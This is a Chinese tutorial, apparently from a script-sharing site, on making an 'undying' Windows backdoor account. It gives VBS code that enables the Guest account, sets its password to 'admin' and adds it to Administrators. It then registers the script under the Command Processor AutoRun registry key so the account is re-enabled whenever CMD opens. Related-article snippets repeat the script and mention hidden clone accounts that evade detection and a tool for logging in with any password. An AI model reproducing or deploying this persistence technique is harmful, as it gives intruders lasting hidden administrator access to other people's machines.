用vbs实现不死帐号的代码

先建立一个VBS文件内容如下:
dim wsh 
set wsh=CreateObject("WScript.Shell")
wsh.run "net user guest /active:yes",0
wsh.run "net user guest admin",0
wsh.run "net localgroup administrators guest /add",0

上面一段VBS的意思就是激活GUEST帐号,并且加为高级管理组,设置密码为admin

那为什么不用那个BAT,继续往下看变知,再找到注册表中下面的键:

HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun
和/或
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun

在AutoRun键内输入VBS的路径!如:d:/ao/fj126.net/id.vbs
先看看这两个位置的介绍:
如果 /D 未在命令行上被指定,当 CMD.EXE 运行时,它会自动寻找以下 REG_SZ/REG_EXPAND_SZ 注册表变量。如果其中一个或两个都存在,这两个变量会先予执行。
也就是说,只要启动了CMD就会运行上述的脚本,可以说成是CMD关联吧。
接着进入注册表,找到上面的位置
OK了,我们来实验一下
我们再打开CMD开一下
怎么样,又激活了吧,如果不用VBS而改用BAT会出现什么后果呢?我们来看一下
知道为什么不用BAT了吧,完

(0)

相关推荐

  • 用vbs实现不死帐号的代码

    先建立一个VBS文件内容如下: dim wsh  set wsh=CreateObject("WScript.Shell") wsh.run "net user guest /active:yes",0 wsh.run "net user guest admin",0 wsh.run "net localgroup administrators guest /add",0 上面一段VBS的意思就是激活GUEST帐号,并且加为高

  • VBS 修改远程桌面端口号的代码

    复制代码 代码如下: '=========================================================================================== CheckOS ' 检查操作系统版本 CheckMeState ' 检查程序运行状态 main ' 执行主程序 Sub main() Dim PortNumberOld, PortNumberNew Set wso = CreateObject("WScript.Shell") P

  • Java Web 实现QQ登录功能一个帐号同一时间只能一个人登录

    对于一个帐号在同一时间只能一个人登录,可以通过下面的方法实现: 1 .在用户登录时,把用户添加到一个ArrayList中 2 .再次登录时查看ArrayList中有没有该用户,如果ArrayList中已经存在该用户,则阻止其登录 3 .当用户退出时,需要从该ArrayList中删除该用户,这又分为三种情况 ① 使用注销按钮正常退出 ② 点击浏览器关闭按钮或者用Alt+F4退出,可以用JavaScript捕捉该页面关闭事件, 执行一段Java方法删除ArrayList中的用户 ③ 非正常退出,比如

  • 利用SQL SERVER建立登录WINDOWS帐号

    那一刻,我的心跳到了嗓子眼. 运行建立帐号命令,OK! 远程登录,输入帐号,密码,OK!终于又进去了! ××××××××××××××××××× 我忽然发现,数据库服务器登录不了了. 提示帐号密码过期.按提示修改,提交,又说我没权限修改密码! CNM,这样来害我.这个帐号属于administrators,原先那个默认的administrator被我停掉了.因此这个帐号是进入系统的唯一通道. 接着发现后果比我想象的要严重更多: 1.硬盘做了RAID5,这样即使拿到硬盘,可能也读不出数据库文件了. 2

  • SQL2000中的默认sa帐号的修改与删除方法

    现在用MSSQL的地方太多了,有很多做技术的个人电脑上也安装SQL专业版,因为它用的多,但用的人都知道,SQL有个超级用户sa,此用户默认情况下,它指派给固定服务器角色 sysadmin,并不能进行更改.一般懂点安全问题的技术人员都会把这个密码修改掉,但修改再复杂的密码都不是绝对安全的,一些暴力破解软件,菜鸟都会用.那怎么办呢,最好的办法就是删除或改名,下面提供方法. 为了加强安全把默认的sa用户更改掉,安全性会有大幅提升. Alter LOGIN sa DISABLE Alter LOGIN

  • SQL2000中改名和删除默认sa帐号的最安全方法

    这个sa一般情况下是既不可以更改名称,也不可以删除,呵呵,有点鸡肋的味道,弃置可惜,食之无味.在偶装上 sql2000之后,感觉总之怪怪的,放着这个后门在,始终都不放心,担心有一天被人破出密码,那偶的电脑不就完拉,偶在黑道混拉那么多天,要是传出去,有损颜面啊.可能你回说设个强壮点的密码,这个办法是可行,可不是长久之记,所谓斩草要除根,要是把sa给删拉就不用担心那些"黑客"暴力破解拉. 呵呵,前面说拉那么半天废话,可能你已经看的不耐烦拉,好,这就说道正题,大家跟着我来一起把sa给大卸八块

  • 一个隐蔽克隆帐号的方法

    文章作者:a11yesno 信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 漏洞发现日期 05年某月 注:因为最近没怎么关注网络安全 凭记忆中貌似没人说过这个方法 所以放出来 不要拍砖我 thx! 原理很简单的啊 sam的 FV键值吧 重点如何躲过检测 一般的检测克隆帐号的都是检测 sam里面有没有相同的 FV吧 利用这个特性绕过检测吧 呵呵 步骤 1.net user allyesno freexploit /add&net localgroup administrat

  • NtGodMode.exe任意密码登录windows系统帐号下载

    作者:golds7n[LAG] 大小:9216 Bytes MD5 :7026217dc72aa564a2834995d7a7b017 来源:安全焦点 --------– NtGod Private Powered By golds7n[LAG] --------– Usage: NtGodMode.exe ON|OFF NTGod NT上帝模式,打开上帝模式可以用任意密码登录任意windows系统帐号,从而达到不增加帐号.不破坏被入侵主机系统的情况下,登录系统帐号. 情 景再现: 当你在进行主

  • 完全解剖安全帐号管理器(SAM)结构

    安全设置不得不需要了解的东西一.摘要 分析安全帐号管理器结构是在一个多月前做的事情了,只零碎地记录下片段,没有发布过.不发布的主要原因是安全帐户管理器(SAM)是WIN系统帐户管理的核心,并且非常系统化,我也有很多地方仅仅是进行的推断和猜测,同时,SAM hack可能造成启动时lsass.exe加载帐户管理器出错,即便是安全模式也不能修复(启动时候必然加载SAM)使得整个系统启动崩溃(我通常需要依靠第二系统删除SAM文件来启动).至于现在发布出来,主要是因为Adam和叮叮的<克隆管理员帐号>种

  • QQ多帐号自动登录批处理脚本

    复制代码 代码如下: '定义QQ程序路径.帐名.密码 Dim Program1,a,b Program1= "C:\Program Files\Tencent\QQ\Bin\QQ.exe" Set WshShell=createobject("wscript.shell") '运行QQ主程序 Set oExec=WshShell.Exec(Program1) WScript.Sleep 1000 '激活QQ窗口 WshShell.AppActivate "

随机推荐